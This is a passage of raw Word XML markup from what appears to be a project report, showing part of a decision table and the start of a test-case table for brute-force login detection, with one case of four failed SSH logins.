              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2F983AC4" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log BRUTE_FORCE — CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2F983AC4" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Update existing row (no new row)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for Brute-Force Detection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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466"/>
        <w:gridCol w:w="1648"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2EBA6366" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case / Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attribute and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4 failed SSH logins, run detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
